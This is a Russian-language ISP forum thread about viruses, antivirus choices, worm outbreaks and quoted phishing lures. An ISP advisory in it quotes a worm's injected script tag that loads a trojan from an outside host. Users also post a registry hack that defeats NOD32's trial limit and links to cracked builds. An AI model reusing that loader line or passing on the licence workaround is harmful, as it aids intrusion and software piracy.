2G3NiUS: это не дистрибутив заразный, это антивирус определяет сервер как потенциальную дыру в системе. DrWeb ругаеться аналогично на все версии данного ftp сервера.
Кстати ни кто не знает, не ведут ли себя антивирусы аналогично и с почтовым сервером ArGoSoft.Mail.Server, а то лежит дистрибутив и на него тоже ругаеться как на троян.

антивирус определяет сервер как потенциальную дыру в системе.
Версия 6.0.0.1 работает без проблем.
Т.е. предлагаешь мне деинсталлировать Касперского?
Или не пользоваться Serv-U вообще? Может можно их как-нибудь "помирить"?
Я думаю есть рациональный выход из этой ситуации.

В четвёртый раз повторяю, что нефиг было скачивать расширенные антивирусные базы!!!
Именно в них присутствуют FlashGet (опознаётся как BannerWare) и SERV-U (опознаётся как backdor). Это просто курам на смех, но расширенные антивирусные базы как-раз и созданы для параноиков...
Короче, установите в настройках обновления - Скачивать стандартные антивирусные базы.

Это я о Каспере и паутиныче.

нефиг было скачивать расширенные антивирусные базы!!!
Пользуюсь Kaspersky Antivirus Personal Pro 5.0.391
Не поверишь, но расширенные базы я НИ РАЗУ не скачивал.
В настройках ВООБЩЕ не присутсвует выбор между стандартными и расширенными базами.

Ну здесь может быть два варианта:
1. Поставить другой сервер.
2. Для надёжности скачать дистрибутив с оф.сайта.

Для надёжности скачать дистрибутив с оф.сайта.
Именно эта мысль и пришла мне в голову, но как на зло и-нет трафик закончился.
Надеюсь это исправит положение.

Пользуюсь Kaspesky Antivirus Personal Pro 5.0.391
Не поверишь, но расширенные базы я НИ РАЗУ не скачивал.
В настройках ВООБЩЕ не присутсвует выбор между стандартными и расширенными базами.А я пользую Kaspesky Antivirus Personal 5.0.237 (НЕ PRO), но даже в нём есть такой выбор!!! ;)

Раз и два.
Подскажи, пожалуйста, как быть?

Как быть? Например, установи Каспера той же версии, что у меня... и спокойно обновляйся с И-нета.

Как быть? Например, установи Каспера той же версии, что у меня... и спокойно обновляйся с И-нета.
Я предпочитаю полную защищенность и стараюсь использовать последние версии программ, крайне необходимых для стабильной работы компьютера.
Всем известно, что в нашей сети гуляет не мало вирусов.
Alexiy, спасибо за совет. Я все таки попробую скачать Serv-U с официального сайта, может это действительно поможет, а если нет, буду думать насчет Касперского.

НОВЫЙ КОМПЬЮТЕРНЫЙ ВИРУС ЗАРАЖАЕТ ДОКУМЕНТЫ ОТБОРНЫМ МАТОМ
В Камчатской области при рассмотрении представленного прокуратурой дела о денежных хищениях в Камчатрыббанке судейская коллегия обнаружила, что суть дела изложена отборными нецензурными выражениями. Обескураженные сотрудники прокуратуры сослались на то, что данное недоразумение произошло в результате заражения компьютера вирусом.
В связи с происшедшим прокурор области приказал подчиненным тщательнее проверять дела, предназначенные для передачи в суд.:)

ну нет опять какая нить зараза к нам прилетит!

НОВЫЙ КОМПЬЮТЕРНЫЙ ВИРУС ЗАРАЖАЕТ ДОКУМЕНТЫ ОТБОРНЫМ МАТОМ
В Камчатской области при рассмотрении представленного прокуратурой дела о денежных хищениях в Камчатрыббанке судейская коллегия обнаружила, что суть дела изложена отборными нецензурными выражениями. Обескураженные сотрудники прокуратуры сослались на то, что данное недоразумение произошло в результате заражения компьютера вирусом.
В связи с происшедшим прокурор области приказал подчиненным тщательнее проверять дела, предназначенные для передачи в суд.
Ну надо было им отмазаться после пьяной чей то выходки....
Вирус, который заменяет слова такими же по смыслу, но с использованием мата-это бред.

Ну надо было им отмазаться после пьяной чей то выходки....
Вирус, который заменяет слова такими же по смыслу, но с использованием мата-это бред.Ну, почему же? Совсем нет. Всё возможно. Взять хотя бы генератор мата. Изначально на паскале, а после переделан под Дельфи с добавлением шаблонов получаемого текста... Да я и сам со словами в детстве любил поиграться на Q-BASIC ещё (правда без мата)... Возможно, НО Я НЕ ВЕРЮ! :tease:

НОВЫЙ КОМПЬЮТЕРНЫЙ ВИРУС ЗАРАЖАЕТ ДОКУМЕНТЫ ОТБОРНЫМ МАТОМ
В Камчатской области при рассмотрении представленного прокуратурой дела о денежных хищениях в Камчатрыббанке судейская коллегия обнаружила, что суть дела изложена отборными нецензурными выражениями. Обескураженные сотрудники прокуратуры сослались на то, что данное недоразумение произошло в результате заражения компьютера вирусом.
В связи с происшедшим прокурор области приказал подчиненным тщательнее проверять дела, предназначенные для передачи в суд.


Бред, скорей всего в Word`e в параметрах автозамены кто-то покопался... :sty092: :sty092: :sty092:

Я уже так шутил...

Похоже, что в Интернет со вчерашнего дня началась очередная эпидемия нового вирусного червя. По крайней мере у меня на работе почти на все ящики посыпался, пока фильтры не обновились.
На почту с неизвестного адреса приходят сообщения типа:

Mail server report.

Our firewall determined the e-mails containing worm copies are being sent from your computer.
Nowadays it happens from many computers, because this is a new virus type (Network Worms).

Using the new bug in the Windows, these viruses infect the computer unnoticeably.
After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses
Please install updates for worm elimination and your computer restoring.

Best regards,
Customers support service

Во вложении - ZIP архив (например, Update-KB8017-x86), в котором находится EXE файл. Для маскировки использует стандартную иконку, как у TXT документа - легко перепутать с текстовым файлом.
В базы данных Лаборатории Касперского и Dr.Web новая зараза уже добавлена.
Зараза называется Email-Worm.Win32.Warezov.bu (Касперский) или Win32.HLLM.Limar (Dr.Web).
Описание на данный момент "находится в разработке" :)

Вопрос: DrWEB CureIt cейчас выявит этого червя? Хочу разобраться: со 2 октября у меня пинг по 32 бт вырос с <1мс до 30-60мс, средняя скорость скачивания упала с 1-3Мб/с до 400кб/с, странички стали открываться медленее. NOD32 обновлён, сканю-ничего. Может вирус у кого в пдсети, я в 33, он подключается и тормозит другие компы. Откликнитесь у Вас такое наблюдается сейчас?

Помогите, пожалуйста...
Является ли это атаками или просто сканированием портов?
40205
Если это атаки, очень прошу владельцев данных IP проверить свои компьютеры, т.к. атаки мешают и тормозят мой компьютер....

Помогите, пожалуйста...
Является ли это атаками или просто сканированием портов?
40205
Если это атаки, очень прошу владельцев данных IP проверить свои компьютеры, т.к. атаки мешают и тормозят мой компьютер....

Позвони в тех. поддержку:whistlin:

Похоже, что в Интернет со вчерашнего дня началась очередная эпидемия нового вирусного червя. По крайней мере у меня на работе почти на все ящики посыпался, пока фильтры не обновились.
<...>
В базы данных Лаборатории Касперского и Dr.Web новая зараза уже добавлена.
Зараза называется Email-Worm.Win32.Warezov.bu (Касперский) или Win32.HLLM.Limar (Dr.Web).
Описание на данный момент "находится в разработке" :)
Неясным образом подхватил заразу, хоть почтой не пользовался недели 2. Базы "Каспера" обновляю ежедневно, равно как и инициирую полную проверку компьютера. Находить гадость - находит (в папке system32), а лечить и удалять отказывается. Что делать?:sty080:

Не пробовал скачать DrWEB CureIt с офф сайта ? Потребуется полчаса вместе с проверкой и удалением. Попытка не пытка.

Microsoft рекомендует не открывать документы Word
8 декабря 2006, 10:12

Эксперты по безопасности Microsoft рекомендуют не открывать и не сохранять полученные из Интернета документы текстового редактора Word из-за обнаруженных сбоев в защите программы от взлома.

В наиболее распространенной версии редактора, выпускаемого с 2000 года, обнаружена опасная «брешь». Хакеры могут получить несанкционированный доступ к компьютеру «жертвы», отправив ей на электронную почту письмо с вложенным документом Word, содержащим опасные программы. Пользователь может получить вирус и через документ Word, открытый через гиперссылку на каком-либо сайте в Интернете.

Об этом базирующаяся в Редмонде (штат Вашингтон) компьютерная корпорация Microsoft проинформировала своих клиентов через каналы Интернет. На сайте компании до сих пор еще не выставлен обещанный «патч» - программный элемент для решения этой проблемы. Вместе с тем, Microsoft указывает, что «брешь» отсутствует в новом редакторе Word 2007 для операционной системы Windows Vista, продажи которой для некорпоративных клиентов стартуют лишь 30 января 2007 года.

А пока не выйдет новая программа или не будет опубликован «патч», компания рекомендует не открывать документы Word по любым ссылкам в компьютерной сети Интернет. Одновременно программисты из Редмонда настоятельно советуют не открывать и не сохранять на жестком диске «пристегнутые» файлы в формате Word, если они получены по электронной почте не только от неизвестных отправителей, но и от друзей и коллег «без предварительной договоренности». Желательно открывать файлы, лишь уточнив их название у отправителя, сообщает ИТАР-ТАСС.

Осваиваю новый фаерволл, подскажите что за периодическая блокировка йпишника: 33.189?

P.S: Большой респект владельцу IP: 192.168.33.189, помогает в действии осваивать новые фаеры.
Для WIN.XP2 зто безвредная атака, но чтоб не доставал звуковыми сигналами - на пробу: запретил этому удалённому адресу всякую TCP активность.

win.dcom.exploit
первый же запрос в гугль привел на http://forum.kaspersky.com/index.php?showtopic=29748

Эта атака на DCOM RPC Vulnerability (Lovesan worm) в Windows (уязвимость описана в базе данных Майкрософта как MS03-026).

Если кому интересно мое мнение, то поставил на несколько компов вот этот антивирь - Avira AntiVir® PersonalEdition Classic (http://www.free-av.com/)
Программа бесплатная (иногда только напоминает об этом :) ), не сильно (а точнее вообще никак) грузит систему, корректно борется с вирями, относительно просто настраивается (можно вообще по умолчанию всё оставить).
Минус - отсутствие русского языка.

Резюме - доволен :yes:

+1 Avira AntiVir® PersonalEdition Classic

Несколько лет стоял на старенькой машине и отлично справлялся со своими задачами.

Согласен, для бесплатного - неплохой функционал....

Но самым лучшим, бесплатным антивирусом, является Avast! 4.7 Home Edition.
Кстати, бесплатную версию все-таки потребуется зарегистрировать. Для этого необходимо зайти на официальный сайт программы, заполнить короткую анкету и получить регистрационный ключ. Он будет действовать 14 месяцев, а потом можно будет еще раз свободно перерегистрироваться.

А обновляться будет на автомате? Или надо ручками?

А обновляться будет на автомате? Или надо ручками?

Обновления происходят ежедневно, имеется возможность автоматизировать этот процесс.

Но самым лучшим, бесплатным антивирусом, является Avast! 4.7 Home Edition.
Кстати, бесплатную версию все-таки потребуется зарегистрировать. Для этого необходимо зайти на официальный сайт программы, заполнить короткую анкету и получить регистрационный ключ. Он будет действовать 14 месяцев, а потом можно будет еще раз свободно перерегистрироваться.
Юзал Аваст! 4.7 Professional-отлично ловит вирусы сканером, но проактивная защита не удовлетворяет:thumbsdow т.к. он пропустил вирус. после которого начались страшные глюки. После сканирования и удаления этого вируса все прошло. НОД32 в этом плане мастер.:sty101:
ИМХО

Nod32 вообще вне конкуренции. С его функционалом и возможностями, можно спать спокойно. Кстати, никакие Fix-ы не устанавливайте !

Правильно-левый сервак рулит:sty101:

Правильно-левый сервак рулит:sty101:

Смотря у кого. Надо же немного поискать/подумать, как так получается, а если не судьба - 46$

Подскажите сервак обновления для Нод 32,те которые стоят по умолчанию,почему то стали просить пароль.Или где можно скачать файлик хотябы с еженедельным обнослением.Последняя вирусная база 2113.

Подскажите сервак обновления для Нод 32
Переустанови нод и установи фикс к нему - у меня работает исправно!

я установил всё тоже самое ещё пол года назад.причём тот же комплект исправно пахал на двух компах.Фигня начилась примерно неделю назад,на моё и брата компе.

Выкладываю полное практическое руководство по NOD32 для Standart version 2.5 . Это офиц., мануал в пдф формате:
В принципе на офиц., сайте все это есть.
http://www.mydatabus.com/3z/tznvy.pbz/odooleg/EsetNOD32Install.pdf (~10мб)

Выкладываю полное практическое руководство по NOD32 для Standart version 2.5Спасиба за манул,вот скрин ошибки при обновлении.вписывал всякий бред,не помогает.:sty080:

Василёк (http://www.solnechnogorsk.net/forum/member.php?u=3147), если версия не "обработана напильником", то вписывать туда нужно не всякий бред, а настоящие имя и пароль. И тогда всё даже работает. :)

Спасиба за манул,вот скрин ошибки при обновлении.вписывал всякий бред,не помогает.:sty080:

Было тоже самое, установил другую версию 2.7 от Сандро, и всё ок -)

Было тоже самое, установил другую версию 2.7 от Сандро, и всё ок -)Поверх старой можно ставить?

100% надо удалить, и дополнительно глянуть, какая папка осталась - руками дочистить, я обычно и реестр дочищаю если чо остаётся.
Для ирушек на компе и профиксенный NOD 32 пойдёт , однако вирусы распостраняются даже с ОEМ дисками к оборудованию для комьютера и отключают ваш антивирус. Касперского если правильно настроить, очень трудно отключить. Не знаю есть в NOD -е такая фишка. Допустим клавиатурные шпионы, вам большого вреда не принесут, а вот троянчиков NOD пропускает - это хуже, получается надо к нему в пару ещё что то ставить , а потом это что то начнет втихаря управлять твоим компьютером.

2 Василёк: Тут (ftp://192.168.12.12/Upload/!!!SOFT!!!/NOD32 Anti-Virus System/) возьми Nod32 v2.70.32.Скачал сегодня утром с инета. Не требует ни паролей, ни ключей. У меня заработал отлично и обновился тут же :sty101:

c ip 17.191 был закинут,в общую папку,фаил с вирусом viking CH.

2 Василёк: Тут (ftp://192.168.12.12/Upload/!!!SOFT!!!/NOD32 Anti-Virus System/) возьми Nod32 v2.70.32.Скачал сегодня утром с инета. Не требует ни паролей, ни ключей. У меня заработал отлично и обновился тут же :sty101:

Вот кстати вопросег по ноду , я стал замечать ,что в последнее время он не обновляеться и время от времени вылазит ошибка : неправильное имя пользователя ...

последнее время в аску мои же друзья кидают вот это сообщение "My party pics:

"
хотя говорят,что ничего не писали.Это вирус
ПРОСБА не КАЧАТЬ ФАИЛ

Добрый вечер.
У моего друга такая проблема.он установил себе нового касперского.и тот сразу нашел у него трояна.Касперский его удалил.почистил систему.Вроде все нормально.но попасть в интернет он не может-просто не соединяет.так уже продолжается дня два.Посоветуйте,что можно сделать

Касперский не 6-версии случайно?

именно 6

Ну тогда, скорее всего, проблема кроется тут:

.....установил себе нового касперского..............но попасть в интернет он не может-просто не соединяет....
Надо его правильно настроить! (Касперского)

Давайте уточним.
Он установил антивирус или Касперский Секьюрити Центр (KIS)?
Антивирус вполне безопасен, а вот KIS включает в себя фаервол, который вполне может заблокировать доступ в сеть.

Установил как раз KIS.
Возможно ли разблокировать работу интернета??

И я заметил. У нас в сети какие-то гаденькие вирусики шастают. И даже иногда подписываются.Чур,меня.

Установил как раз KIS.
Возможно ли разблокировать работу интернета??

Если программа нужна - разбирайтесь с настройками.
Не умеете (не хотите) - приглашайте друзей (спецов), либо удаляйте программу.
Ставить надо только то, с чем умеете работать, вот и все советы.

Надеюсь владелец ip_192.168.18.143 читает этот раздел... :whistlin: оттуда такая гадость лезет...

ESET Smart Security - полностью интегрированное решение для безопасности и включает антивирус, anti-spyware, личный брандмауэр и антиспам.

Бета версия: http://download1.eset.com/special/essbeta/ess_nt32_enu.msi
Мне понравился. Перед этим нужно NOD32 удалить.

Кстати а что означает приставка beta? Или это что-то типа тестовой версии?

Угу...

Сегодня опять по ICQ пришла ссылочка. На Пэрис Хилтон посмотреть предлагали. Не проходите по этой ссылке. Теперь сей вирус шлёт дрянь всем попало, а не только людям из контактного листа. Мне, например, пришло сообщение от тётушки из Чехии. Такая же тема у друга была.

В "аське" свои дополнительные сведения: о себе, работе, дате рождения и т.д не указывайте. Вообщем все поля оставляете пустыми. Только НИК.
"Тётушки из Чехии" больше не должны беспокоить.

Если не поможет, можно Анти-спам бота прикрепить.

на мыло приходят письма следующего содержания:


Уважаемые пользователи службы WebMoney. В связи с участившимися случаями незаконного завладения средствами с кошельков пользователей, рекомендуем Вам установить себе на компьютер новый патч, исправляющий несколько програмных ошибок.
Также если Вы не являетесь пользователем службы WebMoney, но используете Яндекс Деньги, то этот патч также обезопасит и Вас от несанкционированного проникновения в Ваш кошелёк.
Данное дополнение приложено к письму для удобства скачивания.

С Уважением служба тех. поддержки WebMoney совместно с Яндекс (support@webmoney.ru)
не качайте, тоже вирус)

Постоянные атаки с 28.198 Атака RPC DCOM

подскажите,плизззз!!!!!!
можно ли не удаляя своей антивирусной программы ,проверить комп другой какой-нибудь????и какой?
(возникло недоверие,но удалять пока не хотелось бы.)

Выключите антивирус, скачайте (ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe)Dr.Web CureIT (ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe)
и проверяйте...

Выключите антивирус, скачайте (ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe)Dr.Web CureIT (ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe)
и проверяйте...
спасибо.
обнаружен вирус,но он не удаляется,а перемещен(в карантин).
что это значит? надо ли дальше что-то делать?
я в этом не секу абсолютно.хелп!!

спасибо.
обнаружен вирус,но он не удаляется,а перемещен(в карантин).
что это значит? надо ли дальше что-то делать?
я в этом не секу абсолютно.хелп!!

сли не удаляется, значит он используется, а если он используется, значит он запущен, а следовательно, жмём ctrl+alt+delete, выбираем закладку "процессы" находим заражённый файл (процесс), и закрываем =)
но! лучше напишите сюда что за файл и где он лежал, мало ли он системный, хотя на врядли, но всё равно напишите =) потом уже можете закрывать и удалять

сли не удаляется, значит он используется, а если он используется, значит он запущен, а следовательно, жмём ctrl+alt+delete, выбираем закладку "процессы" находим заражённый файл (процесс), и закрываем =)
но! лучше напишите сюда что за файл и где он лежал, мало ли он системный, хотя на врядли, но всё равно напишите =) потом уже можете закрывать и удалять
Documents and Setting.....trojan 20

ftp://192.168.11.11/Upload/- Вирусы и борьба с ними
ftp://192.168.12.12/Upload/- Вирусы и борьба с ними

На самом деле можно и не выключая антивирь запускать Dr.Web CureIT (довольно неплохая софтинка)- он не инсталится в системе- только скидывает логи. Хотя сканирование ОСи с McAfee (экспиремента ради) результатов не дало (во всяком случае у меня)...

бугага по асе пришла шняга которая процитирована ниже.
Памятник таким особям за изобретательность при жизни ставить надо.


Добрый вечер дорогие читатели, вот и пришел к нам новый год, и в честь этого знаменательного

события мы выпустили совершенно новую неизвестную программу для увеличения денег на лицевом

счёте мобильных операторов популярной сотовой связи. Для того что бы получить столь интересную

программку вам просто надо пройти по ссылке <...>, там вас ожидает архив размером ~13

килобайта, вы скачиваете его, помещаете на рабочий стол, распакуите и запускаете через командную

строку, как это сделать читайте в инструкции к программе «BalanceUp.exe», после этого программа

произведет некоторые установки драйвер для работоспособности исчезнет с рабочего стола, после

этого через несколько секунд появится поле вода вашего номера телефона и поле выбора вашего

оператора, вы вбиваите свой номер телефона, выбираите оператора и жмете кнопку "Пополнить

баланс" и через несколько минут вам на счёт поступят денежные средства в размере 1UE (UE-условная

еденица) и сообщение с уведомлением о пополнении счёта.

Вследствие последнего сообщения(http://new.solnet.ru/content/view/238/4/), хотелось бы узнать, каким оброзом абонентам сообщалсь о том что с их компьютеров идут вирусные атаки?

Голосом, по телефону. Если такая возможность была. Можете предложить (обсудить) другой вариант?

2Нютик: возможно вирус (вирусы).

Люди, подскажите какую лучше антивирусную программу поставить(был касперский)? Смогу ли установить сама?

NOD32, версия 2.7

NOD32, версия 2.7
Не хотелось бы устраивать очередную "холивор", просто к сведению. Именно NOD32 (и этой же версии) на одном из моих компьютеров регулярно пропускает троянов (при ежедневном обновлении баз!). Всё больше склоняюсь к возврату на Касперского.

Как заставить NOD постоянно скачивать обновления без всяких паролей и прочей лабуды!!! (Испробованно мной - все превосходно работает)
Собственно способ: поправьте в реестре HKEY_LOCAL_MACHINESOFTWAREEsetNodCurrentVersionInfoView_CLSID забитое там значение на 0. После всех манипуляций вы сможете использовать вашу триальную копию несколько миллионов дней (что-то около 46000 лет)! Кстати, при этом она будет легко обновляться по официальному адресу http://www.nod32.com/nod_eval/


P.S. Если кто не знает как войти в реест: Выберите в меню Пуск пункт Выполнить, введите в поле Открыть команду regedit и нажмите кнопку ОК.

Каспер стоит с 2005 года (на домашнем),и не разу не подводил.Обновление стоит каждые 3 часа.Насчет НОДА ничего не скажу(не пользовался),а АВАСТ ещё то ... пропускает много

Не хотелось бы устраивать очередную "холивор", просто к сведению. Именно NOD32 (и этой же версии) на одном из моих компьютеров регулярно пропускает троянов (при ежедневном обновлении баз!). Всё больше склоняюсь к возврату на Касперского.

Да... И как я уже писал и ты был этому свидетелем, идеальных антивирусов нет, во всех имеются какие то дырки... Лучше всего установить 2 неконфликтующих между собой антивируса, ибо дырки у них как бы это странно не звучало, разные.. То есть говоря простым языком, один будет прикрывать другой...
З.Ы. Только не делайте одним из двух каспера, ору от него будет... Связка аваст + нод (оба фриварных) сбою не даёт...
Даже после последних сообщений на сайте сети усомнился и проверил доктором вебом, но нет, всё чисто.
З.Ы.Ы. На слабых машинах тоже не рекомендую...

Каспер стоит с 2005 года (на домашнем),и не разу не подводил.Обновление стоит каждые 3 часа.Насчет НОДА ничего не скажу(не пользовался),а АВАСТ ещё то ... пропускает много

Я на Avaste и Outpost Firewall четыре года сижу машина чиста!:whistlin: Проверено Касперским!:yes:

А у меня вообще какая-то фигня была... Я заходила в инет, допустим на рамблер, а он мне пишет, что обнаружен вирус (чаще ЧЕРВЬ). НО! Обнаружен он на сайте, где я отродясь не была! Как-то www.k (http://www.k)[далее какиет-то цифорки].com Я выхожу, табличка пропадает. ........ Что это значит?

вот здесь именно про это и написано: http://new.solnet.ru/content/view/238/4/

а именно:

Технически это выглядит так: вирус, рассылая ARP пакеты, подменяет собой шлюз и начинает работать как прокси между клиентом и настоящим шлюзом, при этом добавляя в проходящий через него HTTP трафик JavaScript-код <script LANGUAGE="javascript1.2" src="хттп://g.asdafdgfgf.com/ads.js"></SCRIPT> для загрузки трояна, предположительно он также может собирать пароли из идущего "мимо" трафика. Может иметь массу разновидностей. Антивирус ругается на запись " обнаружено: троянская программа Trojan-Downloader.JS.FYM.a URL: хттп://x.222360.com/un.js"

и если антивирус ругается, значит у Вас все в порядке, антивирус про данного червя знает и не пропустит.

Сейчас мы ищем возможность огородить "чистых" пользователей сети от уже зараженных машин, но на данный момент общего решения нет, единственный пока способ оградиться от этого червя - это добавить статическую ARP запись на шлюз на каждом компьютере пользователя, но как вы понимаете всем это сделать не возможно.

Нашёл тут интересную програмку, кто что скажет?

Описание:
Клон фантастической Машины Времени, - RollBack Rx, чьи технологии, доселе недоступные, открывают уже сегодня пользователю возможность реально отказаться от антивирусов, фаерволов и других систем защиты системы компьютера, как будто и не было вирусных и хакерских атак, неправильных и разрушающих действий установленных программ, роковых ошибок самого пользователя или полного краха системы. Итак, никакой головной боли! - EAZ-FIX Professional делая, за 5 сек, снимки системы, позволяет возвращать обратно ее назад, всего за 10 сек, всю, целиком 100%, включая пользовательские данные и настройки, на часы, недели и даже месяцы, даже в том случае, когда сама Windows уже не загружается. Есть возможность извлекать из этих моментальных снимков нужные или забытые файлы. Предотвращает доступ к компьютеру, если он украден. Перемещает, если необходимо систему с настройками и неповрежденными файлами на новый компьютер и пр.

Спектр применения программы весьма широк: домашний пользователь, беспокоящийся о деструктивных действиях вирусов и домочадцев, Системщики, которые обязаны постоянно поддерживать компьютеры в рабочем состоянии; Центры тестинга софта, которые нуждаются в частой переустановке программ; Компьютерные Лаборатории, которые всегда должны иметь чистые системы и т д.. EAZ-FIX Professional является на сегодняшний день, самым легким, простым и быстрым продуктом на рынке, для возвращения ситуации назад, в исправное состояние, выбравших его для себя, более чем 1 250 000 пользователями по всему миру.

делая, за 5 сек, снимки системы, позволяет возвращать обратно ее назад, всего за 10 сек, всю, целиком 100%
Это каким же образом?

2DimmY
Без понятия) Надо попробовать...
Кому интересно:
EAZ-FIX Professional v8.0.0.0
скачать с рапиды (http://rapidshare.com/files/84542627/EAZ-FIX.Professional.v8.0.0.0.rar)
скачать с летитбит (http://letitbit.net/download/332b78757443/EAZ-FIX.Professional.v8.0.0.0.rar.html)

EAZ-FIX Professional v8.0.0.0 (скачать с 11.11) (ftp://192.168.11.11/Upload/!!!SOFT!!!/EAZ-FIX.Professional.v8.0.0.0.rar)

Скорее всего:
1. Места на харде будет жрать астрономическими объёмами.
2. Тормозить систему
3. Врядли предотвратит кражу данных с компьютера, хакерских атак, троянов.

Кстати, пару дней назад что-то искала в яндексе, на первых нескольких страницах касперский просто заблокировал многие ссылки при попытке зайти по ним, мотивируя наличием троянов. Раньше с таким количеством заразы не сталкивалась.

У меня в личном кабинете каким то образом был выключен интернет:sty065:хотя он там постоянно был включен.У знакомого тоже такое было.Это что вирус?

valeriy: Ну в Вашем случае я думаю это не вирус, а вот с этим (http://new.solnet.ru/content/blogcategory/3/35/) связано :wink:

хотя он там постоянно был включен
Минздрав сети предупреждает - уходя (из интернета) гасите свет (выключайте интернет). Ведь не зря ж в личном кабинете есть выключатель ;).

valeriy: Ну в Вашем случае я думаю это не вирус, а вот с этим (http://new.solnet.ru/content/blogcategory/3/35/) связано :wink:

А я думаю что за лаги были, надо почаще на оф сайт захаживать)

Минздрав сети предупреждает - уходя (из интернета) гасите свет (выключайте интернет). Ведь не зря ж в личном кабинете есть выключатель ;).
а у меня при выключенном всё равно работает,не отключается:sty065:
это что,тоже проявление вируса??

Нет, это повод позвонить в службу техподдержки (62-60-60), либо (что иногда проще) воспользоваться альтернативными средствами связи - письмо на емейл support@solnet.ru, либо с использованием системы помощи (http://support.solnet.ru/newticket.php).

Народ,что творится с ИНЕТом?:sty065: По СЕТИ играть становится не возможно.Все симптомы вирусной активности,описаны на ДОМ странице...Уже цельную неделю мучусь:mad:..Комп на вирусы проверял не однократно,усё в порядке,а ЛАГИ продолжаются..ВОПРОС????? Как боротся с этим дерьмом,может кто знает АААААА?????:frown:

А может причина в том что этот мега вирус поразил солнетовские узлы?

2discer, написано же, что поражение одного компа вирусом ведет к снижению скорости на всем сегменте.
У меня вот тоже периодически пропадает соединение - но нечасто, так что в целом нареканий нет.

Ну это понятно,но проблем надо как-то решать.Бабосы-то снимают каждый день,а сервиса никакого..Интересно у других провайдерах такаяже засада?

Да. У моей знакомой, например, интернет уже третий день не работает. А живет в Москве.

Отделяйте плиз мух от котлет.
Вирусы у абонентов (которые они сами себе скачали, несмотря на широкую пропаганду (об этом говорят менеджеры при заключении договора, служба тех.поддержки всегда об этом напоминает во время консультаций по телефону, на форуме об этом говорится постоянно, на сайте есть необходимая информация (http://support.solnet.ru/faq.php?categoryid=9))) как относятся к сервису сети? Более того - у заблокированных абонентов абонентская плата не взимается - компания идет навстречу и понимает сложившуюся ситуацию. И это ещё не сервис???

Считаю, что надо вычислять и блокировать всех зараженных абонентов(знаю сложно, знаю криков будет много...). Но ведь они не только себе нормально жить не дают, а также и другим людям из их подсети...
Поэтому наиболее практичный рецепт: вычисление->блокировка->уведомление->помощь абоненту(если потребуется, возможно даже не бесплатная)->разблокировка.
З.Ы. ИМХО, так будет лучше всем(ну или по крайней мере большинству, у которого стоят антивирусы и защитные программы правильно настроенные, а всё равно ведь летает).

Есть предложение..Всем новым абонентам при подключении к ИНЕТУ,устанавливать,БЕСПЛАТНО, АНТИВИРУС, в качестве подарка.:sty101:А то приедут спецы ,кабель воткнут в комп ,покажут дом страницу,и досвидания:hi:...калупайтесь как хотите....А так будет всем АЙС.

Обычно они показывают ещё и 11.11 и страницу техподдержки... Сложно было там немного покопаться и найти антивирус?
З.Ы. Вообще я думаю, что если их попросить, особенно в текущей ситуации, то они врядли откажут сами.

Сотрудники сети действительно показывают некоторые ресурсы, в том числе сайт Технической Поддержки, где можно найти несколько бесплатных антивирусов (http://support.solnet.ru/faq.php?do=article&articleid=91). Какой нравится - такой и ставьте. А то, знаете ли, на всех не угодишь :) - одним нужен один антивирус, другим нравится другой. Поэтому пусть уж абонент сам решит что ему нужно. На многих современных ноутбуках уже изначально частенько стоит лицензионный антивирус - нужно лишь его настроить.

Есть предложение..Всем новым абонентам при подключении к ИНЕТУ,устанавливать,БЕСПЛАТНО, АНТИВИРУС, в качестве подарка.:sty101:А то приедут спецы ,кабель воткнут в комп ,покажут дом страницу,и досвидания:hi:...калупайтесь как хотите....А так будет всем АЙС.
Полностью согласна!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
А то я замучалась сама уже с антивирусом и всех знакомых достала.
Вот было бы замечательно, если бы всё сразу установили, не было бы никакой головной боли.

Janna добавил(а) 21.01.2008 в 12:19
Всем спасибо за советы, осталось только мастера найти!!!
Пыталась с сайта Тех. поддержки скачать антивирус-всё бесполезно!

Janna добавил(а) 21.01.2008 в 13:01
да, я поставила avast v, касперского установить не смогла.Комп начал глючить конкретно, зайти никуда не могу.

to Janna.
Такие антивирусные программы как "Avast" и "Антивирус Касперского" не могут существовать на одной операционной системе одновременно. Даже после удаления касперского с компьютера, надо почистить систему специальной утилитой с сайта avp.ru, и только после этого устанавливать awast.

Вот было бы замечательно, если бы всё сразу установили, не было бы никакой головной боли.
Интересно, а покупая машину вы просите продавцов научить Вас ездить, или же сначала получаете права и только потом покупаете машину? Или Вы думаете, что компьютер это что то типа тостера - раз, два и уже умеешь? Пока Вы сами не поймете, как работает та или иная программа ни один мастер не сможет её настроить на все случаи жизни.


Пыталась с сайта Тех. поддержки скачать антивирус-всё бесполезно!
Что именно не получилось то? Пишите проблему подробнее пожалуйста.

to Janna.
Такие антивирусные программы как "Avast" и "Антивирус Касперского" не могут существовать на одной операционной системе одновременно. Даже после удаления касперского с компьютера, надо почистить систему специальной утилитой с сайта avp.ru, и только после этого устанавливать awast.
Спасибо, "аваст" удалила,всё проверила на личном опыте, комп глючил конкретно."Касперского" попробую удалить как вы советуете.

Janna добавил(а) 25.01.2008 в 00:50
[quote=Doctor_ORZ;553671]Интересно, а покупая машину вы просите продавцов научить Вас ездить, или же сначала получаете права и только потом покупаете машину? Или Вы думаете, что компьютер это что то типа тостера - раз, два и уже умеешь? Пока Вы сами не поймете, как работает та или иная программа ни один мастер не сможет её настроить на все случаи жизни.
Этим вы хотели показать, какой вы умный!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Расстрою вас, у вас не получилось.На мой вопрос, какую антивирусную программу ставить, вы с высокомерием мне рассказываете, что я должна сама до всего докапаться и по возможности , чтоб даже мастера не помогали, иначе суть программы я не пойму.А не с опытом ли всё приходит, хочу я вас спросить? И сразу вы такой весь в программах разбирающийся за комп сели?

Я вас тоже расстрою - я не умный.
